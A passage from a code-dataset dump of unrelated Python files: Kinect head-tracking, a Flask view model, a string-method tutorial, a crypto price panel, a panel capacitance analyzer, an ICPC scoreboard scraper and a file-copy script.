np.save(self.folder_path+\"/depth/frame_\"+str(self.frame), self.depth_frame)\n self.depth_frame = self.depth_frame.reshape(424,512)\n self.new_depth_frame = True\n\n if self.frame >= 1:\n last_head_locations = copy.copy(self.head_locations)\n # self.head_locations = []\n\n if self.sensor: \n head_location_to_add = self.get_head_location() \n if head_location_to_add is not None: self.head_locations = head_location_to_add\n elif self.frame_name in self.heads_files: \n self.head_locations = [list(element) for element in np.load(self.folder_path+\"heads/\"+self.frame_name)]\n\n if self.record: np.save(self.folder_path+\"/heads/frame_\"+str(self.frame), np.array(self.head_locations))\n\n\n for index, head in enumerate(self.head_locations):\n # print(index, head)\n \n if len(head) == 3:\n # print(head, self.head_locations)\n if self.frame >= 1:\n d = self.get_distances(head, last_head_locations, return_zero = True)\n \n if True:#len(d) > 0:\n \n if len(d) > 0 and min(d) < 150:\n last_coordinate = last_head_locations[d.index(min(d))]\n id_to_add = last_coordinate[3]\n # print(\"self:\", head, \"/head_locations:\", self.head_locations, \"/distances\", d, \"/index:\", d.index(min(d)), \"/id:\", id_to_add)\n else:\n if len(d)>0:\n print(min(d))\n self.head_id_count += 1\n id_to_add = self.head_id_count\n head.append(id_to_add)\n print(\"head_location frame\",self.frame, 
self.head_locations)\n \n\n def user_interface(self):\n pygame.init()\n self._clock = pygame.time.Clock()\n self._infoObject = pygame.display.Info()\n self._screen = pygame.display.set_mode((1430,650), pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self.topdown_surface = pygame.Surface(self.topdown_surface_size, 0, 32)\n self.color_surface = pygame.Surface((1920, 1080), 0, 32)\n self.info_surface = pygame.Surface((400,800), 0,32)\n pygame.display.set_caption('Topdown view')\n pygame.font.init()\n self.myfont = pygame.font.SysFont('Comic Sans MS', 30)\n self.draw_background(self.topdown_surface)\n self._screen.fill(white)\n self.head_id_count = 0\n self.head_locations = []\n self.begin_time = time.time()\n self.fps = 90\n\n self.sensor = True\n self.record = False\n\n if not self.sensor:\n self.folder_name = \"kinect_recording_1606224934\"\n self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/\"+self.folder_name+\"/\"\n self.color_files = [f for f in os.listdir(self.folder_path+\"color\")]\n self.depth_files = [f for f in os.listdir(self.folder_path+\"depth\")]\n self.heads_files = [f for f in os.listdir(self.folder_path+\"heads\")]\n self.last_frame = max([int(element.split(\"_\")[1].split(\".\")[0]) for element in self.heads_files])\n\n if self.record:\n self.folder_name = str(int(time.time()))\n self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/kinect_recording_\"+self.folder_name\n os.mkdir(self.folder_path)\n os.mkdir(self.folder_path+\"/color\")\n os.mkdir(self.folder_path+\"/depth\")\n os.mkdir(self.folder_path+\"/heads\")\n print(\"made directory\", self.folder_path)\n\n while True:\n\n if not self.sensor: self.frame_name = \"frame_\"+str(self.frame)+\".npy\"\n\n self.retrieve_data()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.VIDEORESIZE:\n self._screen = pygame.display.set_mode(event.dict['size'],pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)\n self._screen.fill(white)\n\n if self.head_locations is not None and len(self.head_locations)>0: \n self.draw_background(self.topdown_surface)\n\n self.draw_heads()\n\n self.draw_foreground()\n\n \n self.frame = int((time.time()-self.begin_time)*self.fps)\n if not self.sensor and self.frame > self.last_frame: break\n\n\n def breakout(self):\n pygame.init()\n self._clock = pygame.time.Clock()\n self._infoObject = pygame.display.Info()\n self._screen = pygame.display.set_mode((1430, 650), pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE, 32)\n self.breakout_surface = pygame.Surface((1000,800), 0, 32)\n pygame.display.set_caption('Breakout')\n pygame.font.init()\n self.myfont = pygame.font.SysFont('Comic Sans MS', 30)\n # self.draw_background(self.topdown_surface)\n self._screen.fill(white)\n self.head_id_count = 0\n self.head_locations = []\n self.begin_time = time.time()\n # self.fps = 90\n\n self.sensor = True\n self.record = False\n\n\n\n # if not self.sensor:\n # self.folder_name = \"kinect_recording_1606224934\"\n # self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/\" + self.folder_name + \"/\"\n # self.color_files = [f for f in os.listdir(self.folder_path + \"color\")]\n # self.depth_files = [f for f in os.listdir(self.folder_path + \"depth\")]\n # self.heads_files = [f for f in os.listdir(self.folder_path + \"heads\")]\n # self.last_frame = max([int(element.split(\"_\")[1].split(\".\")[0]) for element in self.heads_files])\n 
#\n # if self.record:\n # self.folder_name = str(int(time.time()))\n # self.folder_path = \"C:/Users/david/Documenten/peno/P_en_O_3_computer_vision/kinect_data/kinect_recording_\" + self.folder_name\n # os.mkdir(self.folder_path)\n # os.mkdir(self.folder_path + \"/color\")\n # os.mkdir(self.folder_path + \"/depth\")\n # os.mkdir(self.folder_path + \"/heads\")\n # print(\"made directory\", self.folder_path)\n\n coordinate = [0,0]\n\n while True:\n\n # if not self.sensor: self.frame_name = \"frame_\" + str(self.frame) + \".npy\"\n\n if self._kinect.has_new_body_frame():\n self._bodies = self._kinect.get_last_body_frame()\n # print(self._bodies, coordinate)\n self.new_body_frame = True\n\n head_location_to_add = self.get_head_location()\n if head_location_to_add is not None: self.head_locations = head_location_to_add\n if len(self.head_locations) > 0:\n coordinate = self.convert_to_coordinates(self.head_locations[0])\n # print(coordinate)\n\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.VIDEORESIZE:\n self._screen = pygame.display.set_mode(event.dict['size'],\n pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE, 32)\n self._screen.fill(white)\n\n if self.head_locations is not None and len(self.head_locations) > 0:\n print(self.head_locations)\n # self.draw_background(self.topdown_surface)\n\n # self.draw_heads()\n\n # self.draw_foreground()\n\n # self.frame = int((time.time() - self.begin_time) * self.fps)\n # if not self.sensor and self.frame > self.last_frame: break\n\n\n\nimport _thread\n\ntopDownObject = TopDownViewRuntime();\n\n# topDownObject.breakout()\ntopDownObject.user_interface()\n#\n\n# topDownObject.d3d_map()\n\n# position = topDownObject.get_position_from_frame((1,1))\n# print(position)\n","sub_path":"kinect_packages/kinect_working_version_sensor_backup3.py","file_name":"kinect_working_version_sensor_backup3.py","file_ext":"py","file_size_in_byte":31503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"312927066","text":"from flask import url_for\n\nclass InnovationCenterTableView:\n def __init__(self,dataquery):\n self.__dataquery = dataquery\n self.items=self.__parse()\n\n def __parse(self):\n items=[]\n for i in self.__dataquery:\n item=self.__itemparse(i)\n items.append(item)\n return items\n\n def __itemparse(self,item):\n id=item.id\n name=item.name\n type_one=item.type_one\n type_two=item.type_two\n if item.image_url is not None:\n imageurl=url_for('api_1_0.uploaded_file',filename=item.image_url)\n else:\n imageurl=''\n r={\n 'id':id,\n 'name':name,\n 'type_one':type_one,\n 'type_two':type_two,\n 'image':imageurl\n }\n return r","sub_path":"app/viewmodels/rollingdata.py","file_name":"rollingdata.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"601443468","text":"# Center() - Returns a centered string\n# Syntax - string.center(length, character)\n# Parameter Values :- Length : The length of the returned string And Character :The character to fill the missing space on each side. 
Default is \" \" (space)\n\n# Print the word \"banana\", taking up the space of 20 characters, with \"banana\" in the middle:\ntxt = \"banana\"\n\nx = txt.center(20)\n\nprint(x)\n\n# Using the letter \"O\" as the padding character:\ntxt = \"banana\"\n\nx = txt.center(20, \"O\")\n\nprint(x)\n","sub_path":"Python_String_Methods/Center().py","file_name":"Center().py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23874075","text":"#!/usr/bin/env python3\nimport sys\nfrom time import sleep\n\nfrom requests import get\nfrom requests.exceptions import ConnectionError\n\n\ndef colorize(text, colorhex='#dea050'):\n return f\"{text}\"\n\n\nif len(sys.argv) > 1:\n print(colorize(\"---\"))\nelse:\n API_BASE = 'https://min-api.cryptocompare.com'\n for attempt in range(3):\n try:\n r = get(f\"{API_BASE}/data/price\", params={'fsym': 'DASH', 'tsyms': 'USD'})\n except ConnectionError:\n sleep(6)\n else:\n price = r.json()['USD']\n print(colorize(f\"${price:.2f}\"))\n break\n","sub_path":"Code/panel_scripts/dash/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395550163","text":"# !usr/bin/Python3\n# -*- coding: UTF-8 -*-\n# to analyze Solomon's the comprehensive Cm(full charge)\n# Rey\n# Version: 5.1\n\nimport numpy as np\nimport pandas as pd\nimport os, sys\nimport csv\nimport time\nimport math\nfrom progressbar import *\nfrom mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\nimport scipy.linalg\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef makeDf(fp, upper, bottom):\n with open(fp, \"r\") as f:\n rows = f.readlines()\n df = []\n df = (rows[upper - 1:bottom])\n df = [x.split() for x in df]\n df = pd.DataFrame(df)\n df = df[0].str.split(\",\", expand = True)\n df = pd.DataFrame(df.loc[:, 1:51])\n for i in range(df.shape[1]):\n df[i+1] = pd.to_numeric(df[i+1])\n return df\n#--- average value ---#\ndef mean_(list):\n return round(sum(list) / len(list), 5)\n\ndef std_(list):\n return round(math.sqrt(sum((list - mean_(list)) ** 2) / (len(list)-1)), 5)\n\ndef remove(list, obj):\n return [x for x in list if x != obj]\n\ndef index(list, value):\n return [f\"Y{i}-Y{i+1}\" for i, x in enumerate(list) if x == value]\n\ndef pre_test(df):\n emp_cnt = 0\n if df.shape[0] != 38 and df.shape[1] != 51:\n switch = False\n emp_cnt += 1\n print(f\"{file}'s shape is wrong! {df.shape[0], df.shape[1]}\")\n err_list.append(f\"{file}'s shape is wrong! 
{df.shape[0], df.shape[1]}\")\n elif min(df.min()) < 16384:\n switch = False\n print(f\"{file} have to be confirmed again!(<16384)\")\n err_list.append(f\"{file} have to be confirmed again!(<16384)\")\n else:\n switch = True\n return switch, emp_cnt\n\ndef dosomework():\n time.sleep(0.01)\n\ndef Test_1(df):\n diff = 0\n count = 0\n diff = max(df.max()) - min(df.min())\n if (diff) < 1800:\n count += 0\n elif (diff) >= 1800:\n count += 1\n return count\n\ndef Test_2(df):\n count = 0\n for j in range(df.shape[1]):\n for i in range(df.shape[0]):\n if df.iloc[i, j] >= 23500 or df.iloc[i, j] <= 20500:\n count += 1\n else:\n count += 0\n return count\n# ---old method--- #\ndef Test_4(df):\n dfmean = round(mean_(df[0:].mean()), 2)\n ub = round(mean_(df[0:].mean()) * 0.15, 2)\n bb = round(mean_(df[0:].mean()) * 0.1, 2)\n count = 0\n for j in range(df.shape[1]):\n for i in range(df.shape[0]):\n if (df.iloc[i, j] - dfmean) >= 0:\n if (df.iloc[i, j] - dfmean) >= ub:\n count += 1\n elif (df.iloc[i, j] - dfmean) <= 0:\n if (df.iloc[i, j] - dfmean) <= -bb:\n count += 1\n else:\n count += 0\n return count\n# ---vendor's method--- #\ndef Test_3(df):\n count = 0\n for i in range(len(df.columns)):\n x = np.linspace(1, len(df.index), len(df.index))\n y = np.asarray(df[i+1])\n fit = np.polyfit(x, y, 2, full=True)[0]\n formula = np.poly1d(fit)\n reg = formula(x)\n ceiling = reg * 1.15\n ground = reg * 0.9\n for j in range(len(df.index)):\n if y[j] > reg[j]:\n if y[j] >= ceiling[j]:\n count += 1\n elif y[j] < reg[j]:\n if y[j] <= ground[j]:\n count += 1\n else:\n count += 0\n return count\n\ndef analyze(data, order):\n x = np.linspace(1, len(data), len(data)) \n y = data\n fit = np.polyfit(x, y, order, full=True)[0]\n formula = np.poly1d(fit)\n y_bar = mean_(data)\n y_hat = formula(x)\n SSR = sum((y_hat - y_bar)**2)\n SSE = sum((y - y_hat)**2)\n SSTO = sum((y - y_bar)**2)\n MAE = sum(abs(y - y_hat))/len(y)\n RMSE = math.sqrt(sum((y - y_hat)**2)/len(y))\n return SSR/SSTO, SSE, MAE, RMSE\n\ndef MDrow(path):\n YMD = []\n YMDline = 0\n switch = True\n fp = os.path.join(path, file)\n with open(fp, \"r\") as f:\n iter_f = iter(f)\n #Find the index of differential\n for i, line in enumerate(iter_f):\n if \"36) MicroDefect\" in line:\n YMDline = i + 16\n with open(fp, \"r\") as f:\n rows = f.readlines()\n YMD = rows[YMDline]\n YMD = YMD.replace(\"%\", \"\")\n YMD = YMD.replace(\"Diff\", \"\")\n YMD = YMD.replace(\",\", \" \")\n YMD = [float(x) for x in YMD.split()]\n if len(YMD) == 0:\n print(\"Y MD is empty!\")\n switch = False\n return YMD, switch\n\ndef rowNumber(path):\n CmUpper = 0\n hCmUpper = 0\n fp = os.path.join(path, file)\n with open(fp, \"r\") as f:\n iter_f = iter(f)\n #Find the index of differential\n for i, line in enumerate(iter_f):\n if \"Reference Value at Charger Time\" in line:\n CmUpper = i + 3\n hCmUpper = i + 53\n CmBottom = CmUpper + 37\n hCmBottom = hCmUpper + 37\n return CmUpper, CmBottom, hCmUpper, hCmBottom\n\n__mode = input(\"Please set analyze mode!\\n\\\n 1 for SSE\\n\\\n 2 for R square\\n\\\n 3 for MAE\\n\\\n 4 for RMSE\\n\\\n (default = MAE)\\n\")\nif __mode != \"\":\n __mode = int(__mode)\nelse:\n __mode = 3\n\nrename_mode = input(\"Do you want to rename the data?\\n\\\n (y/n, default = n)\\n\")\nrename_mode = str(rename_mode)\nif rename_mode == \"y\":\n rename_mode = True\nelif rename_mode == \"n\" or rename_mode == \"\":\n rename_mode = False\n\nplot_all_mode = input(\"Do you want to plot all the results?\\n\\\n (y/n, default = n)\\n\")\nplot_all_mode = str(plot_all_mode)\nif 
plot_all_mode == \"y\":\n plot_all_mode = True\nelif plot_all_mode == \"n\" or plot_all_mode == \"\":\n plot_all_mode = False\n\nif plot_all_mode==True:\n true_pass = False\nelse:\n true_pass = input(\"Do you want to plot the mean and threthold values?\\n\\\n (y/n, default = n)\\n\")\n true_pass = str(true_pass)\n if true_pass == \"y\":\n true_pass = True\n elif true_pass == \"n\" or true_pass == \"\":\n true_pass = False\n\npath = \"./log/\"\nspath = \"./save.csv\"\nerr_path = \"./err.csv\"\n\nfiles = os.listdir(path)\n\npre_write = {\n \"test\":[0]\n}\npredf = pd.DataFrame(pre_write)\n\nsave_mode = True\n\ntry:\n predf.to_csv(spath)\n predf.to_csv(err_path)\nexcept PermissionError:\n print(\"Please close save/err.csv !\")\n save_mode = False\n\n\nfile_list = []\nCmSTDlist = []\nerr_list = []\nTest_1_count_list = []\nTest_2_count_list = []\nTest_3_count_list = []\nTest_4_count_list = []\nlog10_SSE_list = []\nSSE_list = []\nSSE_pass_list = []\nr2_list = []\nr2_pass_list = []\nMAE_list = []\nMAE_pass_list = []\nRMSE_list = []\nRMSE_pass_list = []\nYMD_list = []\nif save_mode==True:\n widgets = ['Progress: ',Percentage(), ' ', Bar('#'),' ', Timer(),\n ' ', ETA(), ' ', FileTransferSpeed()]\n pbar = ProgressBar(widgets=widgets, maxval=10*len(files)).start()\n\n switch = False\n good_cnt = 0\n test_fail = 0\n data_error = 0\n k = 0\n for file in files:\n \n k += 1\n fp = os.path.join(path, file)\n \n try:\n CmUpper, CmBottom, hCmUpper, hCmBottom = rowNumber(path)\n # print(CmUpper, CmBottom, hCmUpper, hCmBottom)\n except:\n print(f\"{file} rows' range wrong!\")\n err_list.append(f\"{file} rows' range wrong!\")\n switch = False\n\n try:\n CmTb = makeDf(fp, CmUpper, CmBottom)\n hCmTb = makeDf(fp, hCmUpper, hCmBottom)\n except:\n print(f\"{file} Full-charge Cm cannot be arranged!\")\n err_list.append(f\"{file} Full-charge Cm cannot be arranged!\")\n switch = False\n\n try:\n switch, _ = pre_test(CmTb)\n if switch == True:\n switch, _ = pre_test(hCmTb)\n\n except ValueError:\n print(f\"{file} min() arg is an empty sequence\")\n err_list.append(f\"{file} min() arg is an empty sequence\")\n switch = False\n try:\n if switch == True:\n YMD, switch = MDrow(path)\n YMD_list.append(max(YMD))\n else:\n print(f\"{file} MD can't be analyzed!\")\n err_list.append(f\"{file} MD can't be analyzed!\")\n switch = False\n except:\n print(f\"{file} MD analyze fail!\")\n switch = False\n\n if switch == True:\n file_list.append(file)\n try:\n Test_1_count = Test_1(CmTb)\n Test_1_count_list.append(Test_1_count)\n except:\n print(f\"{file} test_1 cannot be analyzed!\")\n err_list.append(f\"{file} test_1 cannot be analyzed!\")\n\n try:\n Test_2_count = Test_2(CmTb)\n Test_2_count_list.append(Test_2_count)\n except:\n print(f\"{file} Test_2 cannot be analyzed!\")\n err_list.append(f\"{file} test_2 cannot be analyzed!\")\n\n try:\n Test_3_count = Test_3(CmTb)\n Test_3_count_list.append(Test_3_count)\n except:\n print(f\"{file} Test_3 cannot be analyzed\")\n err_list.append(f\"{file} test_3 cannot be analyzed!\")\n\n try:\n Test_4_count = Test_4(CmTb)\n Test_4_count_list.append(Test_4_count)\n except:\n print(f\"{file} Test_4 cannot be analyzed\")\n err_list.append(f\"{file} test_4 cannot be analyzed!\")\n \n if Test_1_count+Test_2_count+Test_3_count != 0:\n test_fail += 1\n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, \"FAIL_\"+file))\n\n\n analysis_mode = False\n if __mode == 1:\n log10_SSE_list.append(-1)\n SSE_list.append(-1)\n elif __mode == 2:\n r2_list.append(-1)\n elif __mode == 
3:\n MAE_list.append(-1)\n elif __mode == 4:\n RMSE_list.append(-1)\n\n else:\n analysis_mode = True\n \n if analysis_mode == True:\n good_cnt += 1\n x = np.linspace(1, 51, 51)\n y = np.array(CmTb.mean())\n r2, SSE, MAE, RMSE = analyze(y, 2)\n SSE_list.append(round(SSE, 3))\n SSE_pass_list.append(round(SSE, 3))\n log10_SSE_list.append(round(math.log10(SSE), 3))\n r2_list.append(round(r2, 3))\n r2_pass_list.append(round(r2, 3))\n MAE_list.append(round(MAE, 3))\n MAE_pass_list.append(round(MAE, 3))\n RMSE_list.append(round(RMSE, 3))\n RMSE_pass_list.append(round(RMSE, 3))\n\n if __mode == 1:\n try:\n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(SSE, 3)}_\" + file))\n except:\n print(f\"{file} SSE linear regresion error!\")\n elif __mode == 2:\n try:\n \n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(r2, 3)}_\" + file))\n except:\n print(f\"{file} R2 linear regresion error!\")\n elif __mode == 3:\n try:\n \n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(MAE, 3)}_\" + file))\n except:\n print(f\"{file} MAE linear regresion error!\")\n elif __mode == 4:\n try:\n \n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, f\"{round(RMSE, 3)}_\" + file))\n except:\n print(f\"{file} RMSE linear regresion error!\")\n \n\n else:\n data_error += 1\n if rename_mode == True:\n os.rename(os.path.join(path, file), os.path.join(path, \"FAIL_\"+file))\n\n if __mode == 1:\n log10_SSE_list.append(-1)\n SSE_list.append(-1)\n elif __mode == 2:\n r2_list.append(-1)\n elif __mode == 3:\n MAE_list.append(-1)\n elif __mode == 4:\n RMSE_list.append(-1)\n\n print(f\"{file} is empty!\")\n err_list.append(f\"{file} is empty!\")\n file_list.append(file)\n Test_1_count_list.append(-1)\n Test_2_count_list.append(-1)\n Test_3_count_list.append(-1)\n Test_4_count_list.append(-1)\n \n pbar.update(10 * k)\n dosomework()\n pbar.finish()\n\n\n'''#--- plot regression ---#'''\nif plot_all_mode == False:\n if __mode == 1:\n data = log10_SSE_list\n plt_data = SSE_list\n pass_data = SSE_pass_list\n y_label = \"SSE\"\n elif __mode == 2:\n data = r2_list\n plt_data = data\n pass_data = r2_pass_list\n y_label = \"R square\"\n elif __mode == 3:\n data = MAE_list\n plt_data = data\n pass_data = MAE_pass_list\n y_label = \"MAE\"\n elif __mode == 4:\n data = RMSE_list\n plt_data = data\n pass_data = RMSE_pass_list\n y_label = \"RMSE\"\n x = np.linspace(1, len(data), len(data))\n plt.scatter(x, plt_data)\n plt.ylabel(y_label)\n plt.xlabel(\"# of pieces\")\n\nelse:\n if __mode == 1:\n data = log10_SSE_list\n y_label = \"SSE\"\n elif __mode == 2:\n data = r2_list\n y_label = \"R square\"\n elif __mode == 3:\n data = MAE_list\n y_label = \"MAE\"\n elif __mode == 4:\n data = RMSE_list\n y_label = \"RMSE\"\n \n SSE_plt_data = SSE_list\n r2_plt_data = r2_list\n MAE_plt_data = MAE_list\n RMSE_plt_data = RMSE_list\n\n fig = plt.figure()\n x = np.linspace(1, len(data), len(data))\n plt.subplot(221)\n plt.scatter(x, SSE_plt_data)\n plt.title(\"SSE\")\n plt.ylabel(\"SSE\")\n plt.xlabel(\"# of pieces\")\n\n plt.subplot(222)\n plt.scatter(x, r2_plt_data)\n plt.title(\"R square\")\n plt.ylabel(\"R square\")\n plt.xlabel(\"# of pieces\")\n\n plt.subplot(223)\n plt.scatter(x, MAE_plt_data)\n plt.title(\"MAE\")\n plt.ylabel(\"MAE\")\n plt.xlabel(\"# of pieces\")\n\n plt.subplot(224)\n plt.scatter(x, RMSE_plt_data)\n plt.title(\"RMSE\")\n plt.ylabel(\"RMSE\")\n plt.xlabel(\"# of 
pieces\")\n\nsave_dict = {\n \"filename\": file_list,\n \"Max. - Min. < 1800\": Test_1_count_list,\n \"20500 < Cm < 23500\": Test_2_count_list,\n \"(0.9Cm_hat) < Cm < (1.15Cm_hat)\": Test_3_count_list,\n \"(0.9mean) < Cm < (1.15mean)\": Test_4_count_list,\n \"Y_Max MicroDefect\": YMD_list,\n y_label: data\n }\n\nerr_dict = {\n \"Error\": err_list\n }\n\nsave_df = pd.DataFrame(save_dict)\n\nerr_df = pd.DataFrame(err_dict)\nerr_df.to_csv(err_path, index=False)\n\ntry:\n save_df.to_csv(spath, index=False)\nexcept PermissionError:\n print(\"Please close the save data!\")\n\nif true_pass == True and plot_all_mode==False:\n if __mode != 2:\n #--- exclude \"Fail\"(-1) data already ---#\n spec_ceiling = mean_(np.asarray(pass_data)) + 3 * std_(np.asarray(pass_data))\n spec_bottom = mean_(np.asarray(pass_data)) - 3 * std_(np.asarray(pass_data))\n if __mode == 1:\n print(f\"SSE threshold value: {spec_ceiling}\")\n log10_spec_ceiling = math.log10(spec_ceiling)\n print(f\"log10(SSE) threshold value: {log10_spec_ceiling}\")\n else:\n print(f\"{y_label} threshold value: {spec_ceiling}\")\n plt.plot(x, [mean_(np.asarray(pass_data))] * len(x))\n plt.plot(x, [spec_ceiling] * len(x), c=\"r\")\n\nprint(f\"Data Error No.: {data_error} pcs.\")\nprint(f\"Test Fail No.: {test_fail} pcs.\")\nprint(f\"Good Panel No.: {good_cnt} pcs.\")\nprint(f\"Total No.: {k} pcs.\")\n\nplt.show()","sub_path":"MD_Analyzer/MD_analyzer_Ver.5.1.py","file_name":"MD_analyzer_Ver.5.1.py","file_ext":"py","file_size_in_byte":16026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487957625","text":"import requests\nimport json\nfrom os import path\nimport time\nimport bs4\nimport os\n\n\ndef json_input(path):\n with open(path, 'r') as f:\n return json.load(f)\n\n\n_params = json_input('params.json')\ndata_dir = _params['data_dir']\nimage_download_host = _params['image_download_host']\ncharset = _params['charset']\nend_time = _params['end_time']\nstart_time = _params['start_time']\n\n\ndef json_output(data):\n return json.dumps(data, sort_keys=False, separators=(',', ':'), ensure_ascii=False)\n\n\ndef output(filename, data):\n with open(path.join(data_dir, filename), 'w') as f:\n f.write(json_output(data))\n\n\ndef get_timestamp(dt):\n # convert the string to a time struct\n timeArray = time.strptime(dt, \"%Y-%m-%d %H:%M:%S\")\n # convert the time struct to a Unix timestamp\n timestamp = time.mktime(timeArray)\n return int(timestamp)\n\n\ndef get_now():\n return int(time.time())\n\n\ndef get_incorrect_timestamp():\n return min(get_now(), get_timestamp(end_time)) - get_timestamp(start_time)\n\n\ndef mkdir(_path):\n if not path.exists(_path):\n os.makedirs(_path)\n\n\ndef urltobase64(url):\n import base64\n import requests as req\n from io import BytesIO\n print(\"downloading... 
\" + url)\n response = req.get(url)\n img_data_b64 = base64.b64encode(BytesIO(response.content).read())\n print(url + \" downloaded.\")\n return bytes.decode(img_data_b64)\n\n\ndef urllib_download(img_url, dist):\n from urllib.request import urlretrieve\n mkdir(path.split(dist)[0])\n urlretrieve(img_url, dist)\n\n\ndef fetch():\n if 'board_url' in _params.keys():\n board_url = _params['board_url']\n params = (\n ('t', get_now()),\n )\n\n response = requests.get(board_url, params=params)\n # re-decode the body with the charset declared in params.json\n # (the original returned response.text early, leaving this dead code)\n html = response.text.encode(\"latin1\").decode(charset)\n return html\n else:\n board_file = _params['board_file']\n with open(board_file, 'r') as f:\n return f.read()\n\n\ndef team_out(html):\n team = {}\n soup = bs4.BeautifulSoup(html, 'html5lib')\n\n # select the first tbody by default; this breaks if another tbody appears before the standings\n tbody = soup.select('tbody')[0]\n\n trs = tbody.select('tr')\n for tr in trs:\n if not tr.has_attr('id'):\n continue\n\n _team = {}\n team_id = tr['id']\n\n img_src = tr.select('img')[0]['src']\n\n if len(img_src) > 0 and img_src[0] == '/':\n img_src = img_src[1:len(img_src)]\n\n for i in range(10):\n try:\n badge_base64 = urltobase64(\n path.join(image_download_host, img_src))\n break\n except Exception as e:\n print(\"fetch img failed...\")\n print(e)\n\n time.sleep(5)\n\n name = tr.select('img')[0]['title']\n\n _team['official'] = 1\n\n _team['badge'] = {}\n _team['badge']['base64'] = badge_base64\n _team['name'] = name\n team[team_id] = _team\n\n if len(team.keys()) > 0:\n output(\"team.json\", team)\n\n\npre_runs = []\n\n\ndef run_out(html):\n global pre_runs\n\n run = []\n soup = bs4.BeautifulSoup(html, 'html5lib')\n\n tbody = soup.select('tbody')[0]\n trs = tbody.select('tr')\n for tr in trs:\n if not tr.has_attr('id'):\n continue\n\n team_id = tr['id']\n _run = {}\n _run['team_id'] = team_id\n\n score_cells = tr.select('.score_cell')\n index = -1\n\n for score_cell in score_cells:\n index += 1\n\n if index >= 15:\n break\n\n _run['problem_id'] = index\n\n score_correct = score_cell.select('.score_correct')\n score_pending = score_cell.select('.score_pending')\n score_incorrect = score_cell.select('.score_incorrect')\n\n if len(score_correct) > 0:\n timestamp = int(score_correct[0].contents[0].strip(' \\n')) * 60\n cnt = int(score_correct[0].select('span')[\n 0].string.strip(' \\n').split(' ')[0])\n\n _run['timestamp'] = timestamp\n _run['status'] = 'incorrect'\n\n for i in range(1, cnt):\n run.append(_run.copy())\n\n _run['status'] = 'correct'\n run.append(_run.copy())\n\n if len(score_pending) > 0:\n incorrect_cnt = int(score_pending[0].select(\n 'span')[0].string.strip(' \\n').split(' ')[0])\n\n pending_cnt = int(score_pending[0].select(\n 'span')[0].string.strip(' \\n').split(' ')[2])\n\n for i in range(incorrect_cnt):\n _run['status'] = 'incorrect'\n _run['timestamp'] = 0\n run.append(_run.copy())\n\n for i in range(pending_cnt):\n _run['status'] = 'pending'\n _run['timestamp'] = get_incorrect_timestamp()\n run.append(_run.copy())\n\n if len(score_incorrect) > 0:\n cnt = int(score_incorrect[0].select(\n 'span')[0].string.strip(' \\n').split(' ')[0])\n\n for i in range(cnt):\n _run['status'] = 'incorrect'\n _run['timestamp'] = get_incorrect_timestamp()\n run.append(_run.copy())\n\n has_team_and_problem = {}\n\n for item in run:\n has_team_and_problem[str(item['team_id']) +\n \"-\" + str(item['problem_id'])] = 1\n\n _pre_runs = []\n\n for item in pre_runs:\n if (str(item['team_id']) + \"-\" + str(item['problem_id'])) not in has_team_and_problem.keys():\n _pre_runs.append(item)\n\n 
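# keep old runs whose (team, problem) pair was not re-parsed this round, then append the fresh results\n 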
pre_runs = _pre_runs + run\n\n if len(pre_runs) > 0:\n output('run.json', pre_runs)\n\n\ndef sync():\n while True:\n print(\"fetching...\")\n try:\n html = fetch()\n\n team_out(html)\n run_out(html)\n\n print(\"fetched successfully\")\n except Exception as e:\n print(\"fetch failed...\")\n print(e)\n print(\"sleeping...\")\n time.sleep(20)\n\n\nsync()\n","sub_path":"origin-data/icpc/2020/world-finals/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"526547015","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/7/17 09:16\n# @Author : CyIce\n# @Email : 1207201395@qq.com\n# @File : copy_file_1.py\n# @Software: PyCharm\n\nimport os, time\n\n\ndef copy_file(r_path, w_path):\n '''\n Copy a file.\n :param r_path: path of the file to copy\n :param w_path: destination path for the copy\n '''\n fr = open(r_path, \"rb\")\n fw = open(w_path, \"wb\")\n context = fr.read()\n fw.write(context)\n fr.close()\n fw.close()\n time.sleep(1)\n\n\npath = \"./file_1\"\nto_path = \"./file_2\"\n\n# get the names of all files under path\nfile_list = os.listdir(path)\nstart_time = time.time()\nfor file in file_list:\n copy_file(os.path.join(path, file), os.path.join(to_path, file))\nend_time = time.time()\n\nprint(\"Total time: %0.2f\" % (end_time - start_time))\n","sub_path":"多任务/多进程/copy_file_1.py","file_name":"copy_file_1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"463300548","text":"#!/usr/bin/env python3\n\n# copy.py - Walk through a folder tree and search for files with a certain \n# file extension (such as .pdf or 